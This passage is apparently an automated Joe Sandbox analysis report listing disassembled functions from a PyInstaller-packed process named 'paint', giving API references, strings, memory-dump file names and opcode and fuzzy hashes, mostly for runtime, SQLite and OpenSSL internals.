Instruction Fuzzy Hash: AF81F662B0AAC38AD7208B25C5A0E7E77A0FB41784F048132DBAD436E9DF3CE555D700

Function 00007FFDFB0C3EF0 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 183COMMON

Download Yara Rule

APIs

00007FFE1A463010.VCRUNTIME140 ref: 00007FFDFB0C411E

Strings

, , xrefs: 00007FFDFB0C3FAE
CREATE TABLE , xrefs: 00007FFDFB0C400F
, xrefs: 00007FFDFB0C3FCD

Memory Dump Source

Source File: 00000001.00000002.2015138259.00007FFDFB061000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00007FFDFB060000, based on PE: true

Associated: 00000001.00000002.2015020570.00007FFDFB060000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2015138259.00007FFDFB1C1000.00000040.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2015138259.00007FFDFB1C3000.00000040.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2015138259.00007FFDFB1D8000.00000040.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2015663978.00007FFDFB1DA000.00000080.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2015698265.00007FFDFB1DC000.00000004.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffdfb060000_paint.jbxd

Similarity

API ID: 00007A463010
String ID: $, $CREATE TABLE
API String ID: 4225454184-3459038510
Opcode ID: f5dab35276e823905d8a8efc2fbf2e609b3d139e1c4d1f6f4a3d61b1e56e9fbb
Instruction ID: e4ddc4d2088ed6a600a96627194aedbf623c2927f340ddf47d0316ac2453e6cb
Opcode Fuzzy Hash: f5dab35276e823905d8a8efc2fbf2e609b3d139e1c4d1f6f4a3d61b1e56e9fbb
Instruction Fuzzy Hash: F46139A3B0A58346D7118F24A450AB9B7A2FB45BA8F444335DE7D432E9DF3CD446C300

Function 00007FFDFAA01FB0 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 173COMMON

Download Yara Rule

APIs

00007FFE1FFB6570.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FFDFAA01FE8
00007FFE1FFB6570.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FFDFAA02006

Strings

HANGUL SYLLABLE , xrefs: 00007FFDFAA01FD5
CJK UNIFIED IDEOGRAPH-, xrefs: 00007FFDFAA01FFC

Memory Dump Source

Source File: 00000001.00000002.2013426793.00007FFDFAA01000.00000040.00000001.01000000.00000014.sdmp, Offset: 00007FFDFAA00000, based on PE: true

Associated: 00000001.00000002.2013391762.00007FFDFAA00000.00000002.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.2013426793.00007FFDFAA62000.00000040.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.2013426793.00007FFDFAAAE000.00000040.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.2013426793.00007FFDFAAB2000.00000040.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.2013426793.00007FFDFAAB7000.00000040.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.2013426793.00007FFDFAB0F000.00000040.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.2013426793.00007FFDFAB14000.00000040.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.2013426793.00007FFDFAB17000.00000040.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.2013772305.00007FFDFAB18000.00000080.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.2013801898.00007FFDFAB19000.00000004.00000001.01000000.00000014.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffdfaa00000_paint.jbxd

Similarity

API ID: 00007B6570
String ID: CJK UNIFIED IDEOGRAPH-$HANGUL SYLLABLE
API String ID: 4069847057-87138338
Opcode ID: 8c364d9f7697f15a55bc755bfe662b8d9c35c3fd34f27cade82d87210dead623
Instruction ID: 19807aefcaa87a4cd8dd7b5ed9b30235b88938365bfdf15966af87aa85576471
Opcode Fuzzy Hash: 8c364d9f7697f15a55bc755bfe662b8d9c35c3fd34f27cade82d87210dead623
Instruction Fuzzy Hash: 2661E832B1875146E7A88E15A420A7A7652FB94790F48C275EA7D476CCEF7CD80FC700

Function 00007FF6F0BDD6B8 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 154COMMON

Download Yara Rule

APIs

__except_validate_context_record.LIBVCRUNTIME ref: 00007FF6F0BDD6E3
_IsNonwritableInCurrentImage.LIBCMT ref: 00007FF6F0BDD77A
RtlUnwindEx.KERNEL32 ref: 00007FF6F0BDD7D4

Strings

csm, xrefs: 00007FF6F0BDD761

Memory Dump Source

Source File: 00000001.00000002.2013158606.00007FF6F0BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6F0BD0000, based on PE: true

Associated: 00000001.00000002.2013118719.00007FF6F0BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2013204446.00007FF6F0BFB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2013273251.00007FF6F0C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2013273251.00007FF6F0C11000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2013345140.00007FF6F0C14000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff6f0bd0000_paint.jbxd

Similarity

API ID: CurrentImageNonwritableUnwind__except_validate_context_record
String ID: csm
API String ID: 2395640692-1018135373
Opcode ID: c7f5fdff7c0b40b6635b3f9850cf21a5be83d788788a684f503aa9329af71794
Instruction ID: 9ac106860b6b787191b920a5d593524cb2c303b69bb5fbe3892b9a9ea95b391a
Opcode Fuzzy Hash: c7f5fdff7c0b40b6635b3f9850cf21a5be83d788788a684f503aa9329af71794
Instruction Fuzzy Hash: 7D51A432B1A642AADB158B15D444638B7A2EB45B98F904134DAAF877C4FF3EE841C700

Function 00007FFDFB088D30 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 152COMMON

Download Yara Rule

APIs

00007FFE1A463010.VCRUNTIME140 ref: 00007FFDFB088DB7

Strings

database corruption, xrefs: 00007FFDFB088F45
8653b758870e6ef0c98d46b3ace27849054af85da891eb121e9aaa537f1e8355, xrefs: 00007FFDFB088F39
%s at line %d of [%.10s], xrefs: 00007FFDFB088F51

Memory Dump Source

Source File: 00000001.00000002.2015138259.00007FFDFB061000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00007FFDFB060000, based on PE: true

Associated: 00000001.00000002.2015020570.00007FFDFB060000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2015138259.00007FFDFB1C1000.00000040.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2015138259.00007FFDFB1C3000.00000040.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2015138259.00007FFDFB1D8000.00000040.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2015663978.00007FFDFB1DA000.00000080.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2015698265.00007FFDFB1DC000.00000004.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffdfb060000_paint.jbxd

Similarity

API ID: 00007A463010
String ID: %s at line %d of [%.10s]$8653b758870e6ef0c98d46b3ace27849054af85da891eb121e9aaa537f1e8355$database corruption
API String ID: 4225454184-3727861699
Opcode ID: 02b7fb8bc51e8dee6a810458a6e483e8ad1e80f49c70391c8c568b9bf0be5385
Instruction ID: 7b4321c4f40710311e50d71b194808f020aa6e24b2cc718d05bcfcb39a8f8536
Opcode Fuzzy Hash: 02b7fb8bc51e8dee6a810458a6e483e8ad1e80f49c70391c8c568b9bf0be5385
Instruction Fuzzy Hash: 6551ED73B09BC185CB10CF09E4A4AAEBB65F759B84F55803AEA9E037A9DB3CD545C700

Function 00007FFDFB09C677 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 149COMMON

Download Yara Rule

APIs

00007FFE1A463010.VCRUNTIME140 ref: 00007FFDFB09C7BD
00007FFE1A463010.VCRUNTIME140 ref: 00007FFDFB09C7D6

Strings

out of memory, xrefs: 00007FFDFB0A2508
string or blob too big, xrefs: 00007FFDFB0A2193

Memory Dump Source

Source File: 00000001.00000002.2015138259.00007FFDFB061000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00007FFDFB060000, based on PE: true

Associated: 00000001.00000002.2015020570.00007FFDFB060000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2015138259.00007FFDFB1C1000.00000040.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2015138259.00007FFDFB1C3000.00000040.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2015138259.00007FFDFB1D8000.00000040.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2015663978.00007FFDFB1DA000.00000080.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2015698265.00007FFDFB1DC000.00000004.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffdfb060000_paint.jbxd

Similarity

API ID: 00007A463010
String ID: out of memory$string or blob too big
API String ID: 4225454184-2410398255
Opcode ID: 3637a19043f084d588f66de9b4ccfa5c358998dffeaae2edb35b3df82807b365
Instruction ID: 2369decd21c361be4d38f7962e6fc42d33bbcc98957083eac6d5f1190754abfd
Opcode Fuzzy Hash: 3637a19043f084d588f66de9b4ccfa5c358998dffeaae2edb35b3df82807b365
Instruction Fuzzy Hash: 87610666B0969382E7109B26D16067D6760FF42B98F104032EF6D47BEDDF3CE411A710

Function 00007FF6F0BDF2F8 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 146COMMON

Download Yara Rule

APIs

__except_validate_context_record.LIBVCRUNTIME ref: 00007FF6F0BDF320
__FrameHandler3::FrameUnwindToEmptyState.LIBVCRUNTIME ref: 00007FF6F0BDF408

Strings

csm, xrefs: 00007FF6F0BDF342
csm, xrefs: 00007FF6F0BDF45A

Memory Dump Source

Source File: 00000001.00000002.2013158606.00007FF6F0BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6F0BD0000, based on PE: true

Associated: 00000001.00000002.2013118719.00007FF6F0BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2013204446.00007FF6F0BFB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2013273251.00007FF6F0C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2013273251.00007FF6F0C11000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2013345140.00007FF6F0C14000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff6f0bd0000_paint.jbxd

Similarity

API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
String ID: csm$csm
API String ID: 3896166516-3733052814
Opcode ID: 1b872e8f6993e9c5779cc40e3c84c693849f7921638dfce8d08fafba9ab8d571
Instruction ID: f59d71ac9fe0191e497b64ae552422e79337b99eb5124e347d249ac0d90cd728
Opcode Fuzzy Hash: 1b872e8f6993e9c5779cc40e3c84c693849f7921638dfce8d08fafba9ab8d571
Instruction Fuzzy Hash: E351E532A0D38396EB708F219044369B7A2FB56B9AF944135DA6E877C5EF3DE450CB00

Function 00007FF6F0BDEF48 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 146COMMON

Download Yara Rule

APIs

EncodePointer.KERNEL32 ref: 00007FF6F0BDEFA7
_CallSETranslator.LIBVCRUNTIME ref: 00007FF6F0BDEFF3

Strings

MOC, xrefs: 00007FF6F0BDEFBB
RCC, xrefs: 00007FF6F0BDEFC3

Memory Dump Source

Source File: 00000001.00000002.2013158606.00007FF6F0BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6F0BD0000, based on PE: true

Associated: 00000001.00000002.2013118719.00007FF6F0BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2013204446.00007FF6F0BFB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2013273251.00007FF6F0C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2013273251.00007FF6F0C11000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2013345140.00007FF6F0C14000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff6f0bd0000_paint.jbxd

Similarity

API ID: CallEncodePointerTranslator
String ID: MOC$RCC
API String ID: 3544855599-2084237596
Opcode ID: 1984f943fe60021c6db05f5888f7dd086acc6d0e2a461e0c712dd9be4fa02006
Instruction ID: 9394beb1f63151598161e6eac3594eec2bd9f431080c80af28607362a8daae02
Opcode Fuzzy Hash: 1984f943fe60021c6db05f5888f7dd086acc6d0e2a461e0c712dd9be4fa02006
Instruction Fuzzy Hash: 9261B232A0DBC1D1DB609B15E4403AAB7A1FB86784F444235EBAD57B95EF7DD180CB00

Function 00007FFDFB068417 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 128COMMON

Download Yara Rule

APIs

00007FFE1A463010.VCRUNTIME140 ref: 00007FFDFB0684C8
00007FFE1A463010.VCRUNTIME140 ref: 00007FFDFB06854E

Strings

(subquery-%u), xrefs: 00007FFDFB068570
(join-%u), xrefs: 00007FFDFB068559

Memory Dump Source

Source File: 00000001.00000002.2015138259.00007FFDFB061000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00007FFDFB060000, based on PE: true

Associated: 00000001.00000002.2015020570.00007FFDFB060000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2015138259.00007FFDFB1C1000.00000040.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2015138259.00007FFDFB1C3000.00000040.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2015138259.00007FFDFB1D8000.00000040.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2015663978.00007FFDFB1DA000.00000080.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2015698265.00007FFDFB1DC000.00000004.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffdfb060000_paint.jbxd

Similarity

API ID: 00007A463010
String ID: (join-%u)$(subquery-%u)
API String ID: 4225454184-2916047017
Opcode ID: 49fff31b694db0a63015b8c7494567ef428984a6d1a14628475fa2fe61a8c8d4
Instruction ID: 61061186e96f46b65631e3dd3f2c2d60da6c15fe6b92db26c2963e78b6cf8d02
Opcode Fuzzy Hash: 49fff31b694db0a63015b8c7494567ef428984a6d1a14628475fa2fe61a8c8d4
Instruction Fuzzy Hash: C751D772B1A74389EB608E15D066F3923A6FB16BA4F554632D93D072ECEF2CE441E740

Function 00007FFDFB08FEF0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 114COMMON

Download Yara Rule

APIs

00007FFE1A463010.VCRUNTIME140 ref: 00007FFDFB090023

Strings

-, xrefs: 00007FFDFB090007
, xrefs: 00007FFDFB090042
%!.15g, xrefs: 00007FFDFB09006C

Memory Dump Source

Source File: 00000001.00000002.2015138259.00007FFDFB061000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00007FFDFB060000, based on PE: true

Associated: 00000001.00000002.2015020570.00007FFDFB060000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2015138259.00007FFDFB1C1000.00000040.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2015138259.00007FFDFB1C3000.00000040.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2015138259.00007FFDFB1D8000.00000040.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2015663978.00007FFDFB1DA000.00000080.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2015698265.00007FFDFB1DC000.00000004.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffdfb060000_paint.jbxd

Similarity

API ID: 00007A463010
String ID: $%!.15g$-
API String ID: 4225454184-875264902
Opcode ID: 44e7bfd73146257976c8babe6df8ad74685d0057028d93717c232ee9119ed487
Instruction ID: d49eab07cb7645c3d5142722280bbafd74eb6147b87961cb453bf2177352cf7d
Opcode Fuzzy Hash: 44e7bfd73146257976c8babe6df8ad74685d0057028d93717c232ee9119ed487
Instruction Fuzzy Hash: 9A41F972F1978686E710CB2DE061BAA7BA0EB967C4F004125EA9D077AACB3DD115D700

Function 00007FFE007619DD Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 110COMMON

Download Yara Rule

APIs

00007FFDFAB24D31.LIBCRYPTO-3 ref: 00007FFE007A21AB
00007FFDFAB24D31.LIBCRYPTO-3 ref: 00007FFE007A21ED
00007FFDFAB24D31.LIBCRYPTO-3 ref: 00007FFE007A222F

Strings

..\s\ssl\tls_srp.c, xrefs: 00007FFE007A229E, 00007FFE007A22B0

Memory Dump Source

Source File: 00000001.00000002.2016607190.00007FFE00761000.00000040.00000001.01000000.00000011.sdmp, Offset: 00007FFE00760000, based on PE: true

Associated: 00000001.00000002.2016576633.00007FFE00760000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000001.00000002.2016607190.00007FFE007E3000.00000040.00000001.01000000.00000011.sdmpDownload File
Associated: 00000001.00000002.2016607190.00007FFE007E5000.00000040.00000001.01000000.00000011.sdmpDownload File
Associated: 00000001.00000002.2016607190.00007FFE0080D000.00000040.00000001.01000000.00000011.sdmpDownload File
Associated: 00000001.00000002.2016607190.00007FFE00818000.00000040.00000001.01000000.00000011.sdmpDownload File
Associated: 00000001.00000002.2016607190.00007FFE00823000.00000040.00000001.01000000.00000011.sdmpDownload File
Associated: 00000001.00000002.2016859124.00007FFE00827000.00000080.00000001.01000000.00000011.sdmpDownload File
Associated: 00000001.00000002.2016893620.00007FFE00829000.00000004.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffe00760000_paint.jbxd

Similarity

API ID: 00007
String ID: ..\s\ssl\tls_srp.c
API String ID: 3568877910-1778748169
Opcode ID: 5de455a0e33419aeed79645b2a849e8fb5092a76a7a5c4db12254346f5210564
Instruction ID: 8b6517fbce4d300748b82099fa9ab081dd25f3e367956e5cb44124db3375aba6
Opcode Fuzzy Hash: 5de455a0e33419aeed79645b2a849e8fb5092a76a7a5c4db12254346f5210564
Instruction Fuzzy Hash: 5A411221A0BA8384FE54BF59955077822A1BF82F84F1D4536EF5D4B7AEDF3CA8128310

Function 00007FF6F0BD7E10 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 81COMMON

Download Yara Rule

APIs

CreateDirectoryW.KERNEL32(00000000,?,00007FF6F0BD352C,?,00000000,00007FF6F0BD3F23), ref: 00007FF6F0BD7F22

Strings

%.*s, xrefs: 00007FF6F0BD7EDB
\, xrefs: 00007FF6F0BD7E87
%s%c, xrefs: 00007FF6F0BD7E94

Memory Dump Source

Source File: 00000001.00000002.2013158606.00007FF6F0BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6F0BD0000, based on PE: true

Associated: 00000001.00000002.2013118719.00007FF6F0BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2013204446.00007FF6F0BFB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2013273251.00007FF6F0C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2013273251.00007FF6F0C11000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2013345140.00007FF6F0C14000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff6f0bd0000_paint.jbxd

Similarity

API ID: CreateDirectory
String ID: %.*s$%s%c$\
API String ID: 4241100979-1685191245
Opcode ID: 517c45005fecb665460f06d6deeb7a52b86fc8f3bacaeb8cdec2a0b3fdaf0698
Instruction ID: 1adcb07dcad7d3e3814122e2ec0d445c8667ee6a73cf12a533492772514a52df
Opcode Fuzzy Hash: 517c45005fecb665460f06d6deeb7a52b86fc8f3bacaeb8cdec2a0b3fdaf0698
Instruction Fuzzy Hash: 3631C92161AAC265EB318710A4507EAA355EF85BE4F840231EA7E877C9FE3DD5018700

Function 00007FF6F0BD2810 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 65windowCOMMON

Download Yara Rule

APIs

MessageBoxW.USER32 ref: 00007FF6F0BD28EA

Strings

Error, xrefs: 00007FF6F0BD28DD
[PYI-%d:%ls] , xrefs: 00007FF6F0BD2868
ERROR, xrefs: 00007FF6F0BD286F

Memory Dump Source

Source File: 00000001.00000002.2013158606.00007FF6F0BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6F0BD0000, based on PE: true

Associated: 00000001.00000002.2013118719.00007FF6F0BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2013204446.00007FF6F0BFB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2013273251.00007FF6F0C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2013273251.00007FF6F0C11000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2013345140.00007FF6F0C14000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff6f0bd0000_paint.jbxd

Similarity

API ID: Message
String ID: ERROR$Error$[PYI-%d:%ls]
API String ID: 2030045667-255084403
Opcode ID: d0f77ace03032ad826a8cfca47aff52564341a40e7b1b64160a5aa56c6ce0663
Instruction ID: c399f70295f292b7a3f56ff47f6c04ec31914b0aee136e82ca984e476719bc4e
Opcode Fuzzy Hash: d0f77ace03032ad826a8cfca47aff52564341a40e7b1b64160a5aa56c6ce0663
Instruction Fuzzy Hash: 9921E272B09B81A2E7109B54F4447EA73A5FB89784F800132EE8E93796EF3DD245C700

Function 00007FF6F0BEC610 Relevance: 6.3, APIs: 4, Instructions: 299fileCOMMON

Download Yara Rule

APIs

GetConsoleOutputCP.KERNEL32 ref: 00007FF6F0BEC68F
WriteFile.KERNEL32 ref: 00007FF6F0BEC957
WriteFile.KERNEL32 ref: 00007FF6F0BEC99D
GetLastError.KERNEL32 ref: 00007FF6F0BECA53

Memory Dump Source

Source File: 00000001.00000002.2013158606.00007FF6F0BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6F0BD0000, based on PE: true

Associated: 00000001.00000002.2013118719.00007FF6F0BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2013204446.00007FF6F0BFB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2013273251.00007FF6F0C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2013273251.00007FF6F0C11000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2013345140.00007FF6F0C14000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff6f0bd0000_paint.jbxd

Similarity

API ID: FileWrite$ConsoleErrorLastOutput
String ID:
API String ID: 2718003287-0
Opcode ID: 1ea6e931977968e7606fd026366deb17473f9f47aeaf25dd19fcfb7bb3399e1d
Instruction ID: 0cbb36abafdf50650cd2a646155c75b64e2594921c9e3c62a75212670793cb35
Opcode Fuzzy Hash: 1ea6e931977968e7606fd026366deb17473f9f47aeaf25dd19fcfb7bb3399e1d
Instruction Fuzzy Hash: 61D13172B18A859AE710CF64D4442AC37B1FB46798B809276DE6ED7BC9EE39D407C700

Function 00007FFDFB0ADBA0 Relevance: 6.2, APIs: 4, Instructions: 218COMMON

Download Yara Rule

APIs

00007FFE1A463010.VCRUNTIME140 ref: 00007FFDFB0ADC87
00007FFE1A463010.VCRUNTIME140 ref: 00007FFDFB0ADCDB
00007FFE1A463010.VCRUNTIME140 ref: 00007FFDFB0ADD37
00007FFE1A463010.VCRUNTIME140 ref: 00007FFDFB0ADDB7

Memory Dump Source

Source File: 00000001.00000002.2015138259.00007FFDFB061000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00007FFDFB060000, based on PE: true

Associated: 00000001.00000002.2015020570.00007FFDFB060000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2015138259.00007FFDFB1C1000.00000040.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2015138259.00007FFDFB1C3000.00000040.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2015138259.00007FFDFB1D8000.00000040.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2015663978.00007FFDFB1DA000.00000080.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2015698265.00007FFDFB1DC000.00000004.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffdfb060000_paint.jbxd

Similarity

API ID: 00007A463010
String ID:
API String ID: 4225454184-0
Opcode ID: c805bd562258d8df5866e84e3d87bde111353fec1875c4e7c43f0334e34767cb
Instruction ID: 7ece7618923dce0f2495141dceadfcb463ad2fb1c7dd2e64c41a806294124932
Opcode Fuzzy Hash: c805bd562258d8df5866e84e3d87bde111353fec1875c4e7c43f0334e34767cb
Instruction Fuzzy Hash: 1A91BE72B0B7478AEB649A12D560A693398FB46BD0F485734EE7D0B7E9DE3CE4109700

Function 00007FF6F0BECFD0 Relevance: 6.2, APIs: 4, Instructions: 218COMMON

Download Yara Rule

APIs

GetConsoleMode.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6F0BECFBB), ref: 00007FF6F0BED0EC
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6F0BECFBB), ref: 00007FF6F0BED177

Memory Dump Source

Source File: 00000001.00000002.2013158606.00007FF6F0BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6F0BD0000, based on PE: true

Associated: 00000001.00000002.2013118719.00007FF6F0BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2013204446.00007FF6F0BFB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2013273251.00007FF6F0C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2013273251.00007FF6F0C11000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2013345140.00007FF6F0C14000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff6f0bd0000_paint.jbxd

Similarity

API ID: ConsoleErrorLastMode
String ID:
API String ID: 953036326-0
Opcode ID: 6e58aef6e17acf8d0a0aea0d946e1cce7a25eacb923cf4c64ad3114965f560b8
Instruction ID: 414f2d05418fb9737e174909a2bf75e93a5527519b2aea8965243ee4d6b7e42a
Opcode Fuzzy Hash: 6e58aef6e17acf8d0a0aea0d946e1cce7a25eacb923cf4c64ad3114965f560b8
Instruction Fuzzy Hash: A291D232F18652A5F7508F6594402BD2BA0BF46B88F944179DE2FA7BC5EE7ED442C700

Function 00007FFDFB0C4180 Relevance: 6.1, APIs: 4, Instructions: 70COMMON

Download Yara Rule

APIs

00007FFE1A463010.VCRUNTIME140 ref: 00007FFDFB0C41F5
00007FFE1A463010.VCRUNTIME140 ref: 00007FFDFB0C4219
00007FFE1A463010.VCRUNTIME140 ref: 00007FFDFB0C4238
00007FFE1A463010.VCRUNTIME140 ref: 00007FFDFB0C4250

Memory Dump Source

Source File: 00000001.00000002.2015138259.00007FFDFB061000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00007FFDFB060000, based on PE: true

Associated: 00000001.00000002.2015020570.00007FFDFB060000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2015138259.00007FFDFB1C1000.00000040.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2015138259.00007FFDFB1C3000.00000040.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2015138259.00007FFDFB1D8000.00000040.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2015663978.00007FFDFB1DA000.00000080.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2015698265.00007FFDFB1DC000.00000004.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffdfb060000_paint.jbxd

Similarity

API ID: 00007A463010
String ID:
API String ID: 4225454184-0
Opcode ID: 2db2c3c66d5ac1fca2ba80e9efd88c0aaff962aced3a1b146ac441fe06bb1eef
Instruction ID: b49f15bada415447a207f70b147077d0d91f12738799464a4c5328632b63cb47
Opcode Fuzzy Hash: 2db2c3c66d5ac1fca2ba80e9efd88c0aaff962aced3a1b146ac441fe06bb1eef
Instruction Fuzzy Hash: 5A219162B0A74283D7649F16B5525BEA361FB45BC4B045135EBEE47FEACF2CE0508300

Function 00007FF6F0BD20C0 Relevance: 6.1, APIs: 4, Instructions: 52COMMON

Download Yara Rule

APIs

